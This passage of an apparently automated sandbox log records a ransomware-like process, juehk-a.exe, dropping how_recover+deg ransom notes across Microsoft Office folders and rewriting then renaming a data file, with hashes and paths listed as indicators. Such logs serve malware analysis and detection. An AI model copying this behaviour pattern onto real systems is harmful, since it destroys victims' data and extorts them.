18807.          sequenceNumber: 1329
18808.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.fr\how_recover+deg.txt
18809.          processinfo:
18810.            pid: 1648
18811.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18812.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18813.            ads:
18814.          fid (ads:): 562949953521245
18815.          ntstatus: 0x0
18816.          CreateOptions: 0x60
18817.        file:
18818.          timestamp: 78731
18819.          mode: close
18820.          sequenceNumber: 1330
18821.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.fr\how_recover+deg.txt
18822.          filesize: 2673
18823.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18824.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18825.          processinfo:
18826.            pid: 1648
18827.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18828.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18829.            ads:
18830.          fid (ads:): 562949953521245
18831.          ntstatus: 0x0
18832.          CreateOptions: 0x0
18833.        file:
18834.          timestamp: 78738
18835.          mode: created
18836.          sequenceNumber: 1331
18837.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.fr\how_recover+deg.html
18838.          processinfo:
18839.            pid: 1648
18840.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18841.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18842.            ads:
18843.          fid (ads:): 562949953521246
18844.          ntstatus: 0x0
18845.          CreateOptions: 0x60
18846.        file:
18847.          timestamp: 78749
18848.          mode: close
18849.          sequenceNumber: 1332
18850.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proof.fr\how_recover+deg.html
18851.          filesize: 9480
18852.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18853.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18854.          processinfo:
18855.            pid: 1648
18856.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18857.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18858.            ads:
18859.          fid (ads:): 562949953521246
18860.          ntstatus: 0x0
18861.          CreateOptions: 0x0
18862.        file:
18863.          timestamp: 78754
18864.          mode: created
18865.          sequenceNumber: 1333
18866.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proofing.en-us\how_recover+deg.txt
18867.          processinfo:
18868.            pid: 1648
18869.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18870.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18871.            ads:
18872.          fid (ads:): 562949953521247
18873.          ntstatus: 0x0
18874.          CreateOptions: 0x60
18875.        file:
18876.          timestamp: 78759
18877.          mode: close
18878.          sequenceNumber: 1334
18879.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proofing.en-us\how_recover+deg.txt
18880.          filesize: 2673
18881.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18882.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18883.          processinfo:
18884.            pid: 1648
18885.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18886.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18887.            ads:
18888.          fid (ads:): 562949953521247
18889.          ntstatus: 0x0
18890.          CreateOptions: 0x0
18891.        file:
18892.          timestamp: 78771
18893.          mode: created
18894.          sequenceNumber: 1335
18895.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proofing.en-us\how_recover+deg.html
18896.          processinfo:
18897.            pid: 1648
18898.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18899.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18900.            ads:
18901.          fid (ads:): 562949953521248
18902.          ntstatus: 0x0
18903.          CreateOptions: 0x60
18904.        file:
18905.          timestamp: 78777
18906.          mode: close
18907.          sequenceNumber: 1336
18908.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Proofing.en-us\how_recover+deg.html
18909.          filesize: 9480
18910.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18911.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18912.          processinfo:
18913.            pid: 1648
18914.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18915.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18916.            ads:
18917.          fid (ads:): 562949953521248
18918.          ntstatus: 0x0
18919.          CreateOptions: 0x0
18920.        file:
18921.          timestamp: 78786
18922.          mode: created
18923.          sequenceNumber: 1337
18924.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PROPLUSR\how_recover+deg.txt
18925.          processinfo:
18926.            pid: 1648
18927.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18928.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18929.            ads:
18930.          fid (ads:): 562949953521249
18931.          ntstatus: 0x0
18932.          CreateOptions: 0x60
18933.        file:
18934.          timestamp: 78790
18935.          mode: close
18936.          sequenceNumber: 1338
18937.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PROPLUSR\how_recover+deg.txt
18938.          filesize: 2673
18939.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18940.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18941.          processinfo:
18942.            pid: 1648
18943.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18944.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18945.            ads:
18946.          fid (ads:): 562949953521249
18947.          ntstatus: 0x0
18948.          CreateOptions: 0x0
18949.        file:
18950.          timestamp: 78801
18951.          mode: created
18952.          sequenceNumber: 1339
18953.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PROPLUSR\how_recover+deg.html
18954.          processinfo:
18955.            pid: 1648
18956.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18957.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18958.            ads:
18959.          fid (ads:): 562949953521250
18960.          ntstatus: 0x0
18961.          CreateOptions: 0x60
18962.        file:
18963.          timestamp: 78805
18964.          mode: close
18965.          sequenceNumber: 1340
18966.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\PROPLUSR\how_recover+deg.html
18967.          filesize: 9480
18968.          md5sum: a68c3caf0be8f1a393c697136926cfd4
18969.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
18970.          processinfo:
18971.            pid: 1648
18972.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18973.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18974.            ads:
18975.          fid (ads:): 562949953521250
18976.          ntstatus: 0x0
18977.          CreateOptions: 0x0
18978.        file:
18979.          timestamp: 78832
18980.          mode: created
18981.          sequenceNumber: 1341
18982.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Publisher.en-us\how_recover+deg.txt
18983.          processinfo:
18984.            pid: 1648
18985.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
18986.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
18987.            ads:
18988.          fid (ads:): 562949953521251
18989.          ntstatus: 0x0
18990.          CreateOptions: 0x60
18991.        file:
18992.          timestamp: 78838
18993.          mode: close
18994.          sequenceNumber: 1342
18995.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Publisher.en-us\how_recover+deg.txt
18996.          filesize: 2673
18997.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
18998.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
18999.          processinfo:
19000.            pid: 1648
19001.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19002.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19003.            ads:
19004.          fid (ads:): 562949953521251
19005.          ntstatus: 0x0
19006.          CreateOptions: 0x0
19007.        file:
19008.          timestamp: 78854
19009.          mode: created
19010.          sequenceNumber: 1343
19011.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Publisher.en-us\how_recover+deg.html
19012.          processinfo:
19013.            pid: 1648
19014.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19015.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19016.            ads:
19017.          fid (ads:): 562949953521252
19018.          ntstatus: 0x0
19019.          CreateOptions: 0x60
19020.        file:
19021.          timestamp: 78860
19022.          mode: close
19023.          sequenceNumber: 1344
19024.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Publisher.en-us\how_recover+deg.html
19025.          filesize: 9480
19026.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19027.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19028.          processinfo:
19029.            pid: 1648
19030.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19031.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19032.            ads:
19033.          fid (ads:): 562949953521252
19034.          ntstatus: 0x0
19035.          CreateOptions: 0x0
19036.        file:
19037.          timestamp: 78869
19038.          mode: created
19039.          sequenceNumber: 1345
19040.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Word.en-us\how_recover+deg.txt
19041.          processinfo:
19042.            pid: 1648
19043.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19044.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19045.            ads:
19046.          fid (ads:): 562949953521253
19047.          ntstatus: 0x0
19048.          CreateOptions: 0x60
19049.        file:
19050.          timestamp: 78873
19051.          mode: close
19052.          sequenceNumber: 1346
19053.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Word.en-us\how_recover+deg.txt
19054.          filesize: 2673
19055.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19056.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19057.          processinfo:
19058.            pid: 1648
19059.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19060.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19061.            ads:
19062.          fid (ads:): 562949953521253
19063.          ntstatus: 0x0
19064.          CreateOptions: 0x0
19065.        file:
19066.          timestamp: 78891
19067.          mode: created
19068.          sequenceNumber: 1347
19069.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Word.en-us\how_recover+deg.html
19070.          processinfo:
19071.            pid: 1648
19072.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19073.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19074.            ads:
19075.          fid (ads:): 562949953521254
19076.          ntstatus: 0x0
19077.          CreateOptions: 0x60
19078.        file:
19079.          timestamp: 78931
19080.          mode: close
19081.          sequenceNumber: 1348
19082.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\Word.en-us\how_recover+deg.html
19083.          filesize: 9480
19084.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19085.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19086.          processinfo:
19087.            pid: 1648
19088.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19089.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19090.            ads:
19091.          fid (ads:): 562949953521254
19092.          ntstatus: 0x0
19093.          CreateOptions: 0x0
19094.        file:
19095.          timestamp: 78940
19096.          mode: created
19097.          sequenceNumber: 1349
19098.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\how_recover+deg.txt
19099.          processinfo:
19100.            pid: 1648
19101.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19102.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19103.            ads:
19104.          fid (ads:): 562949953521255
19105.          ntstatus: 0x0
19106.          CreateOptions: 0x60
19107.        file:
19108.          timestamp: 78947
19109.          mode: close
19110.          sequenceNumber: 1350
19111.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\how_recover+deg.txt
19112.          filesize: 2673
19113.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19114.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19115.          processinfo:
19116.            pid: 1648
19117.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19118.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19119.            ads:
19120.          fid (ads:): 562949953521255
19121.          ntstatus: 0x0
19122.          CreateOptions: 0x0
19123.        file:
19124.          timestamp: 78967
19125.          mode: created
19126.          sequenceNumber: 1351
19127.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\how_recover+deg.html
19128.          processinfo:
19129.            pid: 1648
19130.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19131.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19132.            ads:
19133.          fid (ads:): 562949953521256
19134.          ntstatus: 0x0
19135.          CreateOptions: 0x60
19136.        file:
19137.          timestamp: 78978
19138.          mode: close
19139.          sequenceNumber: 1352
19140.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\Office Setup Controller\how_recover+deg.html
19141.          filesize: 9480
19142.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19143.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19144.          processinfo:
19145.            pid: 1648
19146.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19147.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19148.            ads:
19149.          fid (ads:): 562949953521256
19150.          ntstatus: 0x0
19151.          CreateOptions: 0x0
19152.        file:
19153.          timestamp: 79004
19154.          mode: created
19155.          sequenceNumber: 1353
19156.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\how_recover+deg.txt
19157.          processinfo:
19158.            pid: 1648
19159.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19160.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19161.            ads:
19162.          fid (ads:): 1970324837057029
19163.          ntstatus: 0x0
19164.          CreateOptions: 0x60
19165.        file:
19166.          timestamp: 79009
19167.          mode: close
19168.          sequenceNumber: 1354
19169.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\how_recover+deg.txt
19170.          filesize: 2673
19171.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19172.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19173.          processinfo:
19174.            pid: 1648
19175.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19176.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19177.            ads:
19178.          fid (ads:): 1970324837057029
19179.          ntstatus: 0x0
19180.          CreateOptions: 0x0
19181.        file:
19182.          timestamp: 79017
19183.          mode: created
19184.          sequenceNumber: 1355
19185.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\how_recover+deg.html
19186.          processinfo:
19187.            pid: 1648
19188.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19189.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19190.            ads:
19191.          fid (ads:): 562949953521257
19192.          ntstatus: 0x0
19193.          CreateOptions: 0x60
19194.        file:
19195.          timestamp: 79023
19196.          mode: close
19197.          sequenceNumber: 1356
19198.          value: C:\Program Files\Common Files\Microsoft Shared\OFFICE15\how_recover+deg.html
19199.          filesize: 9480
19200.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19201.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19202.          processinfo:
19203.            pid: 1648
19204.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19205.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19206.            ads:
19207.          fid (ads:): 562949953521257
19208.          ntstatus: 0x0
19209.          CreateOptions: 0x0
19210.        file:
19211.          timestamp: 79030
19212.          mode: created
19213.          sequenceNumber: 1357
19214.          value: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\how_recover+deg.txt
19215.          processinfo:
19216.            pid: 1648
19217.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19218.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19219.            ads:
19220.          fid (ads:): 562949953521258
19221.          ntstatus: 0x0
19222.          CreateOptions: 0x60
19223.        file:
19224.          timestamp: 79037
19225.          mode: close
19226.          sequenceNumber: 1358
19227.          value: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\how_recover+deg.txt
19228.          filesize: 2673
19229.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19230.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19231.          processinfo:
19232.            pid: 1648
19233.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19234.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19235.            ads:
19236.          fid (ads:): 562949953521258
19237.          ntstatus: 0x0
19238.          CreateOptions: 0x0
19239.        file:
19240.          timestamp: 79044
19241.          mode: created
19242.          sequenceNumber: 1359
19243.          value: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\how_recover+deg.html
19244.          processinfo:
19245.            pid: 1648
19246.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19247.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19248.            ads:
19249.          fid (ads:): 562949953521259
19250.          ntstatus: 0x0
19251.          CreateOptions: 0x60
19252.        file:
19253.          timestamp: 79050
19254.          mode: close
19255.          sequenceNumber: 1360
19256.          value: C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\how_recover+deg.html
19257.          filesize: 9480
19258.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19259.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19260.          processinfo:
19261.            pid: 1648
19262.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19263.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19264.            ads:
19265.          fid (ads:): 562949953521259
19266.          ntstatus: 0x0
19267.          CreateOptions: 0x0
19268.        file:
19269.          timestamp: 79057
19270.          mode: created
19271.          sequenceNumber: 1361
19272.          value: C:\Program Files\Common Files\Microsoft Shared\PROOF\how_recover+deg.txt
19273.          processinfo:
19274.            pid: 1648
19275.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19276.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19277.            ads:
19278.          fid (ads:): 562949953521260
19279.          ntstatus: 0x0
19280.          CreateOptions: 0x60
19281.        file:
19282.          timestamp: 79062
19283.          mode: close
19284.          sequenceNumber: 1362
19285.          value: C:\Program Files\Common Files\Microsoft Shared\PROOF\how_recover+deg.txt
19286.          filesize: 2673
19287.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19288.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19289.          processinfo:
19290.            pid: 1648
19291.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19292.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19293.            ads:
19294.          fid (ads:): 562949953521260
19295.          ntstatus: 0x0
19296.          CreateOptions: 0x0
19297.        file:
19298.          timestamp: 79070
19299.          mode: created
19300.          sequenceNumber: 1363
19301.          value: C:\Program Files\Common Files\Microsoft Shared\PROOF\how_recover+deg.html
19302.          processinfo:
19303.            pid: 1648
19304.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19305.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19306.            ads:
19307.          fid (ads:): 562949953521261
19308.          ntstatus: 0x0
19309.          CreateOptions: 0x60
19310.        file:
19311.          timestamp: 79076
19312.          mode: close
19313.          sequenceNumber: 1364
19314.          value: C:\Program Files\Common Files\Microsoft Shared\PROOF\how_recover+deg.html
19315.          filesize: 9480
19316.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19317.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19318.          processinfo:
19319.            pid: 1648
19320.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19321.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19322.            ads:
19323.          fid (ads:): 562949953521261
19324.          ntstatus: 0x0
19325.          CreateOptions: 0x0
19326.        file:
19327.          timestamp: 79106
19328.          mode: created
19329.          sequenceNumber: 1365
19330.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\how_recover+deg.txt
19331.          processinfo:
19332.            pid: 1648
19333.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19334.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19335.            ads:
19336.          fid (ads:): 562949953521262
19337.          ntstatus: 0x0
19338.          CreateOptions: 0x60
19339.        file:
19340.          timestamp: 79111
19341.          mode: close
19342.          sequenceNumber: 1366
19343.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\how_recover+deg.txt
19344.          filesize: 2673
19345.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19346.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19347.          processinfo:
19348.            pid: 1648
19349.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19350.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19351.            ads:
19352.          fid (ads:): 562949953521262
19353.          ntstatus: 0x0
19354.          CreateOptions: 0x0
19355.        file:
19356.          timestamp: 79174
19357.          mode: created
19358.          sequenceNumber: 1367
19359.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\how_recover+deg.html
19360.          processinfo:
19361.            pid: 1648
19362.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19363.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19364.            ads:
19365.          fid (ads:): 562949953521263
19366.          ntstatus: 0x0
19367.          CreateOptions: 0x60
19368.        file:
19369.          timestamp: 79184
19370.          mode: close
19371.          sequenceNumber: 1368
19372.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\1033\how_recover+deg.html
19373.          filesize: 9480
19374.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19375.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19376.          processinfo:
19377.            pid: 1648
19378.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19379.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19380.            ads:
19381.          fid (ads:): 562949953521263
19382.          ntstatus: 0x0
19383.          CreateOptions: 0x0
19384.        file:
19385.          timestamp: 79189
19386.          mode: created
19387.          sequenceNumber: 1369
19388.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\how_recover+deg.txt
19389.          processinfo:
19390.            pid: 1648
19391.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19392.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19393.            ads:
19394.          fid (ads:): 562949953521264
19395.          ntstatus: 0x0
19396.          CreateOptions: 0x60
19397.        file:
19398.          timestamp: 79194
19399.          mode: close
19400.          sequenceNumber: 1370
19401.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\how_recover+deg.txt
19402.          filesize: 2673
19403.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19404.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19405.          processinfo:
19406.            pid: 1648
19407.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19408.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19409.            ads:
19410.          fid (ads:): 562949953521264
19411.          ntstatus: 0x0
19412.          CreateOptions: 0x0
19413.        file:
19414.          timestamp: 79209
19415.          mode: created
19416.          sequenceNumber: 1371
19417.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\how_recover+deg.html
19418.          processinfo:
19419.            pid: 1648
19420.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19421.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19422.            ads:
19423.          fid (ads:): 562949953521265
19424.          ntstatus: 0x0
19425.          CreateOptions: 0x60
19426.        file:
19427.          timestamp: 79213
19428.          mode: close
19429.          sequenceNumber: 1372
19430.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\1033\how_recover+deg.html
19431.          filesize: 9480
19432.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19433.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19434.          processinfo:
19435.            pid: 1648
19436.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19437.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19438.            ads:
19439.          fid (ads:): 562949953521265
19440.          ntstatus: 0x0
19441.          CreateOptions: 0x0
19442.        file:
19443.          timestamp: 79218
19444.          mode: created
19445.          sequenceNumber: 1373
19446.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\how_recover+deg.txt
19447.          processinfo:
19448.            pid: 1648
19449.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19450.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19451.            ads:
19452.          fid (ads:): 562949953521266
19453.          ntstatus: 0x0
19454.          CreateOptions: 0x60
19455.        file:
19456.          timestamp: 79222
19457.          mode: close
19458.          sequenceNumber: 1374
19459.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\how_recover+deg.txt
19460.          filesize: 2673
19461.          md5sum: 615f474c617565cfb0f97ab42bfbf98b
19462.          sha1sum: b5ab1563350aca989fd8b327b40506e0cdce8490
19463.          processinfo:
19464.            pid: 1648
19465.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19466.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19467.            ads:
19468.          fid (ads:): 562949953521266
19469.          ntstatus: 0x0
19470.          CreateOptions: 0x0
19471.        file:
19472.          timestamp: 79229
19473.          mode: created
19474.          sequenceNumber: 1375
19475.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\how_recover+deg.html
19476.          processinfo:
19477.            pid: 1648
19478.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19479.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19480.            ads:
19481.          fid (ads:): 562949953521267
19482.          ntstatus: 0x0
19483.          CreateOptions: 0x60
19484.        file:
19485.          timestamp: 79234
19486.          mode: close
19487.          sequenceNumber: 1376
19488.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\LISTS\how_recover+deg.html
19489.          filesize: 9480
19490.          md5sum: a68c3caf0be8f1a393c697136926cfd4
19491.          sha1sum: 4e9b58da679e38dcc6020d0878c0bea54d36e4ec
19492.          processinfo:
19493.            pid: 1648
19494.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19495.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19496.            ads:
19497.          fid (ads:): 562949953521267
19498.          ntstatus: 0x0
19499.          CreateOptions: 0x0
19500.        file:
19501.          timestamp: 79241
19502.          mode: open
19503.          sequenceNumber: 1377
19504.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\METCONV.TXT
19505.          filesize: 1183416
19506.          processinfo:
19507.            pid: 1648
19508.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19509.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19510.            ads:
19511.          fid (ads:): 562949953501086
19512.          ntstatus: 0x0
19513.          CreateOptions: 0x60
19514.        file:
19515.          timestamp: 79931
19516.          mode: close
19517.          sequenceNumber: 1378
19518.          value: C:\Program Files\Common Files\Microsoft Shared\Smart Tag\METCONV.TXT
19519.          filesize: 1183838
19520.          md5sum: e28e2d3dcf1e618996bd87dcd75865aa
19521.          sha1sum: ea89cd4c4ff96feea5010f22ef2a757b1c2dd142
19522.          processinfo:
19523.            pid: 1648
19524.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19525.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19526.            ads:
19527.          fid (ads:): 562949953501086
19528.          ntstatus: 0x0
19529.          CreateOptions: 0x0
19530.        high_cpu:
19531.          timestamp: 80092
19532.          sequenceNumber: 1379
19533.          total_cpu: 55.882070135746609
19534.          processinfo:
19535.            tainted: true
19536.            pid: 2312
19537.            process_cpu: 55.882070135746609
19538.            imagepath: C:\Users\Administrator\AppData\Local\Temp\73.exe
19539.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
19540.        file:
19541.          timestamp: 80180
19542.          mode: rename
19543.          sequenceNumber: 1380
19544.          filesize: 1183838
19545.          md5sum: e28e2d3dcf1e618996bd87dcd75865aa
19546.          sha1sum: ea89cd4c4ff96feea5010f22ef2a757b1c2dd142
19547.          processinfo:
19548.            pid: 1648
19549.            imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
19550.            md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
